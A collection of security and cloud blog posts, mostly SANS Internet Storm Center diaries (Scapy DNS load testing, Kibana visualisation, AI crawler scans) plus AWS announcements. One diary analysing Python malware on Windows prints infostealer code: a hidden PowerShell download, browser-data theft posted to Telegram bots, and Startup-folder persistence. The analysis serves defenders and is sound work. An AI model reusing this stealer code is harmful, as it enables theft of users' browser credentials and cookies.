Wireshark 4.4.0 is now available, (Sat, Aug 31st)

This post was originally published on this site

This is the first 4.4 release. Many new features have been added, details are here.

One feature I already highlighted are custom columns with field expressions: "Wireshark 4.4.0rc1's Custom Columns".

Other new features I'll be looking at are:

  • automatic profile switching based on display filter
  • converting display filters in to BPF capture filters
  • implementing display filter functions via plugins

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Simulating Traffic With Scapy, (Fri, Aug 30th)

This post was originally published on this site

It can be helpful to simulate different kinds of system activity. I had an instance where I wanted to generate logs to test a log forwarding agent. This agent was processing DNS logs. There are a variety of ways that I could have decided to simulate this activity:

  • Generate the raw log file using a variety of tools including Bash, PowerShell, Python, etc
  • Generate DNS traffic using a Bash script [1], Python script, etc

Since I'm always looking for another way to use Python, I decided to use a Python script to simulate the DNS traffic. 

 

Sending Serially

To start out, I tested sending traffic to a host one request at a time, using a loop that would continue to send requests with Scapy [2] for three minutes. 

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

send_count = 0
while (time.time() - start_time < 180):
    send(dns_query, verbose=False)
    send_count += 1

logging.info(f"Packets sent: {send_count}")
logging.info(f"Query rate of {send_count / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:15:36,216:INFO:root:dns_requests.py:<module>:Packets sent: 42614
2024-08-28 21:15:36,217:INFO:root:dns_requests.py:<module>:Query rate of 236.74056020138102/second

I was able to generate abour 42,000 requests, for a rate of about 236 requests per second. Not bad, but I wanted more. What other methods could I use to generate logs using Scapy to try and get a higher volume?

 

Sending Multiple Requests with Count

Next, I tried using Scapy with the "count" option. For this test I used 42,000 requests as a starting point and then measured the rate. 

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

send_count = 0
send(dns_query, count=42000, verbose=False)

logging.info(f"Complete in {time.time() - start_time} seconds")
logging.info(f"Query rate of {42000 / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:19:40,956:INFO:root:dns_requests_count.py:<module>:Complete in 134.46240949630737 seconds
2024-08-28 21:19:40,957:INFO:root:dns_requests_count.py:<module>:Query rate of 312.35329612384174/second

This was able to give me about 312 reqeusts per second, which was a nice improvement over the previous test, approximately 32% more requests.

 

Sending Multiple Requests with Threading

What about using threading? Could this give me more request volume if I was able to send more data with less of a delay?

import time, logging, sys
from scapy.all import *
from concurrent.futures import ThreadPoolExecutor

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

send_count = 0
runner = ThreadPoolExecutor()
queries = []
while (time.time() - start_time < 180):
    queries.append(runner.submit(send, dns_query, verbose=False))
    send_count += 1


done = False
while not done:
    number_not_complete = 0
    for each_query in queries:
        if each_query.done() == False:
            number_not_complete += 1
            logging.debug(f"State: {each_query._state} left")
    if number_not_complete == 0:
        done = True
        logging.info(f"Processing completed. {number_not_complete} left")
    else:
        logging.info(f"Processing not yet completed. {number_not_complete} left")
    time.sleep(1)

logging.info(f"Packets sent: {send_count}")
logging.info(f"Seconds elapsed: {time.time() - start_time}")
logging.info(f"Query rate of {send_count / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:23:54,199:INFO:root:dns_request_threaded.py:<module>:Processing not yet completed. 278 left
2024-08-28 21:23:55,372:INFO:root:dns_request_threaded.py:<module>:Processing not yet completed. 24 left
2024-08-28 21:23:56,546:INFO:root:dns_request_threaded.py:<module>:Processing completed. 0 left
2024-08-28 21:23:57,547:INFO:root:dns_request_threaded.py:<module>:Packets sent: 45475
2024-08-28 21:23:57,548:INFO:root:dns_request_threaded.py:<module>:Seconds elapsed: 183.54532933235168
2024-08-28 21:23:57,549:INFO:root:dns_request_threaded.py:<module>:Query rate of 247.75896049992585/second  

This gave me about 247 requests per second. A little faster than my first test, but not quite as much as using the "count" option. 

 


Figure 1: Traffic volume comparisons with different Scapy options.

 

 

Scapy sendp() or send()?

I still want more volume. What else could I test? There are multiple functions that can be used to send data with Scapy, including send() and sendp() [3]. Sendp() requires some additional configuration since it isn't handling some of the routing features that send() would be. Would manually configuring options and offsetting some of the routing with help with volume?

First, I neded to some information to properly configure my data submissions. I needed to get my interface name. 

>>> conf.iface
<NetworkInterface_Win Intel(R) Wi-Fi 6E AX210 160MHz [UP+RUNNING+WIRELESS+OK]>

 

With this new data in hand, I tried my new test, adding an Ethernet header and my interface. 

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"
interface = "Intel(R) Wi-Fi 6E AX210 160MHz"

dns_query = Ether()/IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

send_count = 0
sendp(dns_query, count=42000, verbose=False, iface=interface)

logging.info(f"Complete in {time.time() - start_time} seconds")
logging.info(f"Query rate of {42000 / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 22:09:09,894:INFO:root:<stdin>:<module>:Complete in 41.14687180519104 seconds
2024-08-28 22:09:09,894:INFO:root:<stdin>:<module>:Query rate of 1020.7337315664743/second

I was able to achieve a rate of about 1021 requests per second. Over three times the volume from previous tests.

 

Scapy Sending Method Option(s) Sending Rate
send()   236.74 queries/second
send() count=42000 312.35 queries/second
send() threading 247.76 queries/second
sendp() count=42000 1020.73 queries/second

Figure 2: Volume rate comparisons with different scapy options and methods.

 

Since I wanted to make sure that everything was working correctly, I decided to update my script to send one request with sendp() to an external resolver. 

################## EXCERPT ##################

dst_ip = "8.8.8[.]8"
dst_port = 53
query = "testing.ignore"
interface = "Intel(R) Wi-Fi 6E AX210 160MHz"

dns_query = Ether()/IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))
sendp(dns_query, iface=interface)

################## EXCERPT ##################


Figure 3: DNS "NXDOMAIN" response for "testing.ignore", confirming sendp() worked.

 

There are still many other ways to replicate DNS activity and log generation. A good option is simply recording previous sessions in a PCAP and playing them back [3]. Creating the local log file, rather than having the DNS service create the log file, would probably allow for a higher logging volume. It would eliminate any bottlenecks of the DNS service or the device(s) sending the requests. However, replicating the DNS traffic also helped in testing the DNS server in addition to the logging agent. Another benefit of this option is that Zeek [4] data was available to validate the traffic, volume and responses. 

Do you have another way you would have done this stress testing? Let me know!

 

[1] https://www.reddit.com/r/networking/comments/k8tdj7/dns_traffic_generator/
[2] https://scapy.net/
[3] https://scapy.readthedocs.io/en/latest/usage.html
[4] https://zeek.org/


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Live Patching DLLs with Python, (Thu, Aug 29th)

This post was originally published on this site

In my previous diary[1], I explained why Python became popular for attackers. One of the given reason was that, from Python scripts, it’s possible to call any Windows API and, therefore, perform low-level activities on the system. In another script, besides a classic code injection in a remote process, I found an implementation of another goold old technique: live patching of a DLL.

Announcing AWS Parallel Computing Service to run HPC workloads at virtually any scale

This post was originally published on this site

Today we are announcing AWS Parallel Computing Service (AWS PCS), a new managed service that helps customers set up and manage high performance computing (HPC) clusters so they seamlessly run their simulations at virtually any scale on AWS. Using the Slurm scheduler, they can work in a familiar HPC environment, accelerating their time to results instead of worrying about infrastructure.

In November 2018, we introduced AWS ParallelCluster, an AWS supported open-source cluster management tool that helps you to deploy and manage HPC clusters in the AWS Cloud. With AWS ParallelCluster, customers can also quickly build and deploy proof of concept and production HPC compute environments. They can use AWS ParallelCluster Command-Line interface, API, Python library, and the user interface installed from open source packages. They are responsible for updates, which can include tearing down and redeploying clusters. Many customers, though, have asked us for a fully managed AWS service to eliminate operational jobs in building and operating HPC environments.

AWS PCS simplifies HPC environments managed by AWS and is accessible through the AWS Management Console, AWS SDK, and AWS Command-Line Interface (AWS CLI). Your system administrators can create managed Slurm clusters that use their compute and storage configurations, identity, and job allocation preferences. AWS PCS uses Slurm, a highly scalable, fault-tolerant job scheduler used across a wide range of HPC customers, for scheduling and orchestrating simulations. End users such as scientists, researchers, and engineers can log in to AWS PCS clusters to run and manage HPC jobs, use interactive software on virtual desktops, and access data. You can bring their workloads to AWS PCS quickly, without significant effort to port code.

You can use fully managed NICE DCV remote desktops for remote visualization, and access job telemetry or application logs to enable specialists to manage your HPC workflows in one place.

AWS PCS is designed for a wide range of traditional and emerging, compute or data-intensive, engineering and scientific workloads across areas such as computational fluid dynamics, weather modeling, finite element analysis, electronic design automation, and reservoir simulations using familiar ways of preparing, executing, and analyzing simulations and computations.

Getting started with AWS Parallel Computing Service
To try out AWS PCS, you can use our tutorial for creating a simple cluster in the AWS documentation. First, you create a virtual private cloud (VPC) with an AWS CloudFormation template and shared storage in Amazon Elastic File System (Amazon EFS) within your account for the AWS Region where you will try AWS PCS. To learn more, visit Create a VPC and Create shared storage in the AWS documentation.

1. Create a cluster
In the AWS PCS console, choose Create cluster, a persistent resource for managing resources and running workloads.

Next, enter your cluster name and choose the controller size of your Slurm scheduler. You can choose Small (up to 32 nodes and 256 jobs), Medium (up to 512 nodes and 8,192 jobs), or Large (up to 2,048 nodes and 16,384 jobs) for the limits of cluster workloads. In the Networking section, choose your created VPC, subnet to launch the cluster, and security group applied to your cluster.

Optionally, you can set the Slurm configuration such as an idle time before compute nodes will scale down, a Prolog and Epilog scripts directory on launched compute nodes, and a resource selection algorithm parameter used by Slurm.

Choose Create cluster. It takes some time for the cluster to be provisioned.

2. Create compute node groups
After creating your cluster, you can create compute node groups, a virtual collection of Amazon Elastic Compute Cloud (Amazon EC2) instances that AWS PCS uses to provide interactive access to a cluster or run jobs in a cluster. When you define a compute node group, you specify common traits such as EC2 instance types, minimum and maximum instance count, target VPC subnets, Amazon Machine Image (AMI), purchase option, and custom launch configuration. Compute node groups require an instance profile to pass an AWS Identity and Access Management (IAM) role to an EC2 instance and an EC2 launch template that AWS PCS uses to configure EC2 instances it launches. To learn more, visit Create a launch template And Create an instance profile in the AWS documentation.

To create a compute node group in the console, go to your cluster and choose the Compute node groups tab and the Create compute node group button.

You can create two compute node groups: a login node group to be accessed by end users and a job node group to run HPC jobs.

To create a compute node group running HPC jobs, enter a compute node name and select a previously-created EC2 launch template, IAM instance profile, and subnets to launch compute nodes in your cluster VPC.

Next, choose your preferred EC2 instance types to use when launching compute nodes and the minimum and maximum instance count for scaling. I chose the hpc6a.48xlarge instance type and scale limit up to eight instances. For a login node, you can choose a smaller instance, such as one c6i.xlarge instance. You can also choose either the On-demand or Spot EC2 purchase option if the instance type supports. Optionally, you can choose a specific AMI.

Choose Create. It takes some time for the compute node group to be provisioned. To learn more, visit Create a compute node group to run jobs and Create a compute node group for login nodes in the AWS documentation.

3. Create and run your HPC jobs
After creating your compute node groups, you submit a job to a queue to run it. The job remains in the queue until AWS PCS schedules it to run on a compute node group, based on available provisioned capacity. Each queue is associated with one or more compute node groups, which provide the necessary EC2 instances to do the processing.

To create a queue in the console, go to your cluster and choose the Queues tab and the Create queue button.

Enter your queue name and choose your compute node groups assigned to your queue.

Choose Create and wait while the queue is being created.

When the login compute node group is active, you can use AWS Systems Manager to connect to the EC2 instance it created. Go to the Amazon EC2 console and choose your EC2 instance of the login compute node group. To learn more, visit Create a queue to submit and manage jobs and Connect to your cluster in the AWS documentation.

To run a job using Slurm, you prepare a submission script that specifies the job requirements and submit it to a queue with the sbatch command. Typically, this is done from a shared directory so the login and compute nodes have a common space for accessing files.

You can also run a message passing interface (MPI) job in AWS PCS using Slurm. To learn more, visit Run a single node job with Slurm or Run a multi-node MPI job with Slurm in the AWS documentation.

You can connect a fully-managed NICE DCV remote desktop for visualization. To get started, use the CloudFormation template from HPC Recipes for AWS GitHub repository.

In this example, I used the OpenFOAM motorBike simulation to calculate the steady flow around a motorcycle and rider. This simulation was run with 288 cores of three hpc6a instances. The output can be visualized in the ParaView session after logging in to the web interface of DCV instance.

Finally, after you are done HPC jobs with the cluster and node groups that you created, you should delete the resources that you created to avoid unnecessary charges. To learn more, visit Delete your AWS resources in the AWS documentation.

Things to know
Here are a couple of things that you should know about this feature:

  • Slurm versions – AWS PCS initially supports Slurm 23.11 and offers mechanisms designed to enable customers to upgrade their Slurm major versions once new versions are added. Additionally, AWS PCS is designed to automatically update the Slurm controller with patch versions. To learn more, visit Slurm versions in the AWS documentation.
  • Capacity Reservations – You can reserve EC2 capacity in a specific Availability Zone and for a specific duration using On-Demand Capacity Reservations to make sure that you have the necessary compute capacity available when you need it. To learn more, visit Capacity Reservations in the AWS documentation.
  • Network file systems – You can attach network storage volumes where data and files can be written and accessed, including Amazon FSx for NetApp ONTAP, Amazon FSx for OpenZFS, and Amazon File Cache as well as Amazon EFS and Amazon FSx for Lustre. You can also use self-managed volumes, such as NFS servers. To learn more, visit Network file systems in the AWS documentation.

Now available
AWS Parallel Computing Service is now available in the US East (N. Virginia), AWS US East (Ohio), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (Stockholm) Regions.

AWS PCS launches all resources in your AWS account. You will be billed appropriately for those resources. For more information, see the AWS PCS Pricing page.

Give it a try and send feedback to AWS re:Post or through your usual AWS Support contacts.

Channy

P.S. Special thanks to Matthew Vaughn, a principal developer advocate at AWS for his contribution in creating a HPC testing environment.

Vega-Lite with Kibana to Parse and Display IP Activity over Time, (Tue, Aug 27th)

This post was originally published on this site

I have been curious for a while looking at Kibana's Vega log parsing options to try to come up with displays and layout that aren't standard in Kibana. A lot of the potential layouts already exists in Kibana but some of the other aren't easily created and using Vega [2] provides some of the building block to create some of the output that I am researching and testing with DShield sensor data captured by cowrie honeypot [4].

Building a Query in the Visualize Library

In my test query, I wanted to display on the left of the graph the IP List and in the bottom, the date of the activity. This way when I choose to summarize the activity by IP or any of the other fields I happen to select, it will display the activity by date of any IP that was active over time.

A text copy of the JSON code is posted at the bottom. This simple query takes the data from cowrie logs as its input to format the output:

The Data Output

Before I zoom in the time of interest to see some of the long-term activity, this is what the up to 10000 records looks like with all the IPs displayed in this picture. It is now easy to see a cluster of activity in this picture, next we need to zoom in the time of the activity to find which IP has this cluster.

After I zoom in the data, the result of a 7-day query provides the following data of a cluster of activity over time. In this picture, you can see that one IP 193.201.9.156 was active for several hours between 22 Aug 06:00 – 22 Aug 21:00.

DShield SIEM Integration

The primary goal of this test is to integrate this into the DShield SIEM [1] ELK Stack to be able to see overtime which actor are active and how long can they be seen over time in one of the dashboards. Now that we have an IP to look at, the time range can be expended as far as I want, and this picture shows activity of IP 193.201.9.156 over the past 30 days.


Sample Vega-Lite Query

This is the code used in the above example:

{
  $schema: https://vega.github.io/schema/vega-lite/v5.json
  title: Cowrie Logs – Actor Activity over Time
  data: {
    url: {
      %context%: true
      %timefield%: @timestamp
      interval: {%autointerval%: true}
      index: cowrie*
      body: {
        size: 10000
        _source: ["@timestamp","related.ip", "source.address", "user.name"]
      }
    }
    format: {property: "hits.hits"}
  }

  transform: [ 
  {calculate: "toDate(datum._source['@timestamp'])", as: "Time"},
  {"calculate": "datum._source['related.ip']", "as": "IP"},
  {"calculate": "datum._source['user.name']", "as": "Name"}
  ]
  mark: square
  encoding: {
    // https://vega.github.io/vega-lite/docs/timeunit.html#input
    // Change timeUnit to display Month Day and Hour of activity
    x: {"timeUnit": "monthdatehours",field: "Time", type: "ordinal", title: "Date/Time" }
    y: {field: "IP", type: "ordinal", title: "Actor IP Address"}
    color: {field: "IP", type: "ordinal", legend: null}
  }
 }

[1] https://www.elastic.co/guide/en/kibana/current/vega.html
[2] https://vega.github.io/vega/examples/
[3] https://github.com/bruneaug/DShield-SIEM
[4] https://github.com/DShield-ISC/dshield

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Why Is Python so Popular to Infect Windows Hosts?, (Tue, Aug 27th)

This post was originally published on this site

It has been a while since I started to track how Python is used in the Windows eco-system[1]. Almost every day I find new pieces of malicious Python scripts. The programming language itself is not malicious. There are plenty of reasons to use Python on Windows. Think about all Didier's tools[2], Most of them are written in Python!

Why did Python become so popular for attackers? I think that the main reason is that the language is not installed by default on Windows and it can be deployed easily by unpacking some files in any directory without requiring administrator rights:

@echo off
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github[.]com/h4x0rpeter/CookieStealer/raw/main/python.zip -OutFile C:UsersPublicDocument.zip;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden expand-Archive C:UsersPublicDocument.zip -DestinationPath C:UsersPublicDocument;

Python can be expanded using libraries and, if added to the ZIP archive, the attacker will expand default Python capabilities.

Another fact is that Python is not integrated like other scripting languages (JS, VBS, PowerShell) into the AMSI[3] framework. You can easily debug scripts through AMSI:

PS1:> logman start AMSITrace -p Microsoft-Antimalware- Scan-Interface Event1 -o AMSITrace.etl -ets

This command will start recording all activities generated by scripts… except for Python!

Another fact why Python is very popular: it can interact with all layers of the operating system (filesystem, registry, processes, network, …) but can also call any API from any DLL! I mentioned this in my yesterday's diary[4].

Once Python has been deployed on the victim's computer, the malicious script must be delivered. If often the script is downloaded from an online resource, sometimes it can be extracted or … reconstructed! Today, I found a batch file that will generate the malicious script by echoing all the lines in a file on disk:

echo import os,json,shutil,win32crypt,hmac,platform,sqlite3,base64,random,requests,subprocess>>C:UsersPublicstub.py
echo from datetime import datetime,timedelta>>C:UsersPublicstub.py
echo from Crypto.Cipher import DES3>>C:UsersPublicstub.py
echo from Crypto.Cipher import AES>>C:UsersPublicstub.py
echo from pyasn1.codec.der import decoder>>C:UsersPublicstub.py
echo from hashlib import sha1, pbkdf2_hmac>>C:UsersPublicstub.py
echo from Crypto.Util.Padding import unpad >>C:UsersPublicstub.py
echo from base64 import b64decode>>C:UsersPublicstub.py
echo idbot = "backup">>C:UsersPublicstub.py
echo apibot1='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:UsersPublicstub.py
echo id1='-4288554353'>>C:UsersPublicstub.py
echo apibot2='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:UsersPublicstub.py
echo id2='4288554353'>>C:UsersPublicstub.py
echo hostname = os.getenv("COMPUTERNAME")>>C:UsersPublicstub.py
echo usernamex = os.getlogin()>>C:UsersPublicstub.py
echo windows_version = platform.platform()>>C:UsersPublicstub.py
echo now = datetime.now()>>C:UsersPublicstub.py
echo response =requests.get("https://ipinfo.io").text>>C:UsersPublicstub.py
echo ip_country = json.loads(response)>>C:UsersPublicstub.py
echo name_country = ip_country['region']>>C:UsersPublicstub.py

The purpose of the script is simple: It's another infostealer that will exfiltrate collected information via Telegram:

def main():
    numbers=intNumbers()    
    number = "Status number send: " + str(numbers)
    u2 = 'hxxps://api[.]telegram[.]org/bot'+apibot2+'/sendDocument'
    u1 = 'hxxps://api[.]telegram[.]org/bot'+apibot1+'/sendDocument'
    browsers = {
        'chrome': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data"),
        'Edge': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data"),
        'Opera': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable"),
        'Brave': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "BraveSoftware", "Brave-Browser", "User Data"),
        'firefox': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Mozilla", "Firefox", "Profiles"),
        'chromium': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Chromium", "User Data")
    }
    data_path = os.path.join(os.environ["TEMP"], name_f)
    os.mkdir(data_path)
    data_path_ck = os.path.join(os.environ["TEMP"], name_f, "filecookie")
    os.mkdir(data_path_ck)
    for browser_name, browser_path in browsers.items():
        get_browser_data(data_path, browser_path, browser_name)
    zip_file_path = os.path.join(os.environ["TEMP"], name_f + '.zip')
    shutil.make_archive(zip_file_path[:-4], 'zip', data_path)
    if numbers == 1:
        with open(zip_file_path, 'rb') as f:
            requests.post(u1,data={'caption': "n"+"Country : "+name_country + "-" + timezone + "n"+ windows_version +"rnIPAdress:"+ip + "rn"+ number,'chat_id': id1},files={'document': f})
    else :
        with open(zip_file_path, 'rb') as f:
             requests.post(u2,data={'caption': "n"+"Country :  "+ name_country + "-" + timezone +"n"+ windows_version +"rnIPAddress:"+ip + "rn"+ number,'chat_id': id2},files={'document': f})
    shutil.rmtree(data_path, ignore_errors=True)
    try:
        os.remove(zip_file_path)
    except Exception as e:
        print("Error")

Funny, exfiltrated data will be sent to two different Telegram bots depending on the value of $numbers. It's a simple load-balancing solution:

def intNumbers():
    path_demso = r"C:UsersPublicnumber.txt"
    if os.path.exists(path_demso):
        with open(path_demso, 'r') as file:
            number = file.read()
        number = int(number)+1
        with open(path_demso, 'w') as file:
            abc = str(number)
            file.write(abc)
    else:
        with open(path_demso, 'w') as file:
            file.write("1")
            number = ^1
    return number

Finally, persistence will be added via the Startup menu:

for /f %%i in ('echo %USERNAME%') do 
set user=%%i
echo cmd /c C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden C:UsersPublicDocumentpython.exe C:UsersPublicstub.py;>>C:UsersPublicWindows.bat
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -command "Get-Content 'C:UsersPublicWindows.bat' | Set-Content 'C:Users!user!AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupWindows.bat'"

The batch file has again a low VT score (4/65)[5].

Conclusion: Keep an eye on Python processes on your Windows hosts! If you don't need Python for your daily tasks, any process should be considered suspicious!

[1] https://www.sans.org/webcasts/who-said-that-python-was-unix-best-friend-only/
[2] https://blog.didierstevens.com/my-software/
[3] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
[4] https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204
[5] https://www.virustotal.com/gui/file/e721ae2bfd0f3bc4da3b60090aa734cd31878134ed3fdfa49abc4b26b825da47/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: S3 Conditional writes, AWS Lambda, JAWS Pankration, and more (August 26, 2024)

This post was originally published on this site

The AWS User Group Japan (JAWS-UG) hosted JAWS PANKRATION 2024 themed ‘No Border’. This is a 24-hour online event where AWS Heroes, AWS Community Builders, AWS User Group leaders, and others from around the world discuss topics ranging from cultural discussions to technical talks. One of the speakers at this event, Kevin Tuei, an AWS Community Builder based in Kenya, highlighted the importance of building in public and sharing your knowledge with others, a very fitting talk for this kind of event.

Last week’s launches
Here are some launches that got my attention during the previous week.

Amazon S3 now supports conditional writes – We’ve added support for conditional writes in Amazon S3 which check for existence of an object before creating it. With this feature, you can now simplify how distributed applications with multiple clients concurrently update data in parallel across shared datasets. Each client can conditionally write objects, making sure that it does not overwrite any objects already written by another client.

AWS Lambda introduces recursive loop detection APIs – With the recursive loop detection APIs you can now set recursive loop detection configuration on individual AWS Lambda functions. This allows you to turn off recursive loop detection on functions that intentionally use recursive patterns, avoiding disruption of these workloads. Using these APIs, you can avoid disruption to any intentionally recursive workflows as Lambda expands support of recursive loop detection to other AWS services. Configure recursive loop detection for Lambda functions through the Lambda Console, the AWS command line interface (CLI), or Infrastructure as Code tools like AWS CloudFormation, AWS Serverless Application Model (AWS SAM), or AWS Cloud Development Kit (CDK). This new configuration option is supported in AWS SAM CLI version 1.123.0 and CDK v2.153.0.

General availability of Amazon Bedrock batch inference API – You can now use Amazon Bedrock to process prompts in batch to get responses for model evaluation, experimentation, and offline processing. Using the batch API makes it more efficient to run inference with foundation models (FMs). It also allows you to aggregate responses and analyze them in batches. To get started, visit Run batch inference.

Other AWS news
Launched in July 2024, AWS GenAI Lofts is a global tour designed to foster innovation and community in the evolving landscape of generative artificial intelligence (AI) technology. The lofts bring collaborative pop-up spaces to key AI hotspots around the world, offering developers, startups, and AI enthusiasts a platform to learn, build, and connect. The events are ongoing. Find a location near you and be sure to attend soon.

Upcoming AWS events
AWS Summits – These are free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Whether you’re in the Americas, Asia Pacific & Japan, or EMEA region, learn more about future AWS Summit events happening in your area. On a personal note, I look forward to being one of the keynote speakers at the AWS Summit Johannesburg happening this Thursday. Registrations are still open and I look forward to seeing you there if you’ll be attending.

AWS Community Days – Join an AWS Community Day event just like the one I mentioned at the beginning of this post to participate in technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from your area. If you’re in New York, there’s an event happening in your area this week.

You can browse all upcoming in-person and virtual events here.

That’s all for this week. Check back next Monday for another Weekly Roundup!

– Veliswa

From Highly Obfuscated Batch File to XWorm and Redline, (Mon, Aug 26th)

This post was originally published on this site

If you follow my diaries, you probably already know that one of my favorite topics around malware is obfuscation. I'm often impressed by the crazy techniques attackers use to make reverse engineers' lives more difficult. Last week, I spotted a file called "crypted.bat" (SHA256: 453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a) which is detected by no antivirus according to VT[1]. It deserved to be investigated!

OpenAI Scans for Honeypots. Artificially Malicious? Action Abuse?, (Thu, Aug 22nd)

This post was originally published on this site

For a whille now, I have seen scans that contain the pattern "%%target%%" in the URL. For example, today this particular URL is popular:

/%%target%%/wp-content/themes/twentytwentyone/style.css

I have been ignoring these scans so far. The "wp-content" in the URL suggests that this is yet another stupid WordPress scan for maybe the plugin vulnerability of the day.  "twentytwentyone" points to a popular WordPress theme that apparently can be, HOLD YOUR BREATH, be used for version disclosure [1] . In short, this is the normal stupid stuff that I usually do not waste time on. Running WordPress with random themes and plugins? Good luck. I hope you at least add a "!" at the end of your password (which must be "password") to make it so much more secure. 

The scan itself looked broken. The "%%target%%" pattern looked like it was supposed to be replaced with something.

So stupid hackers scanning stupid WordPress installs. I ignored it.

Leave it up to Xavier to educate me that this isn't stupid but artificially intelligent!

Xavier Mertens slack message about user agent with gptbot

So, as it turns out, these scans come predominantly from systems that identify themselves as part of an OpenAIs content-stealing machine. In their battle to keep up with Google's indexing prowess, OpenAI has decided that more is better and is now scanning random IPs, Honeypots, for content. Another option may be that ChatGTP "actions" can be used to trigger these scans.

The easiest way to identify OpenAI's bots is the user-agent:

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)

I looked at all scans containing "%%target%%" since July, and they can all be assigned to OpenAI.

graph of scans for %%target%% showing that they almost exclusively originate from OpenAI

The graph shows the total number of scans for "%%target%%" each day in orange, and the scans originating from OpenAI in blue. For almost all days, the scans from OpenAI explain almost all the scans for "%%target%%" URLs.

With OpenAI finding value in data like this, its little cousin Claude can't be far behind. And indeed, we do see some scans in our honeypot that may be originating from Anthropic's Claude, but there are only few and far between compared to OpenAI. For example, we had this URL being hit on August 20th:

/legal-content/CS/AUTO/?uri=celex%3A32010R1099

The user-agent used by Claude is: 

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)

To help manage this traffic, I added a category to our threatlist API. For IP addresses linked to OpenAI use:

https://isc.sans.edu/api/threatlist/openai?json 

OpenAI published a list of ranges here: https://platform.openai.com/docs/actions/production . Based on our data, a few additional IPs are also scanning and located in adjacent network ranges, indicating that they are also owned by OpenAI (they also exhibit the same behavior). 

or for Anthropic:

https://isc.sans.edu/api/threatlist/anthropic?json

[1] https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/wordpress-theme-twenty-twenty-one-out-of-date/

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

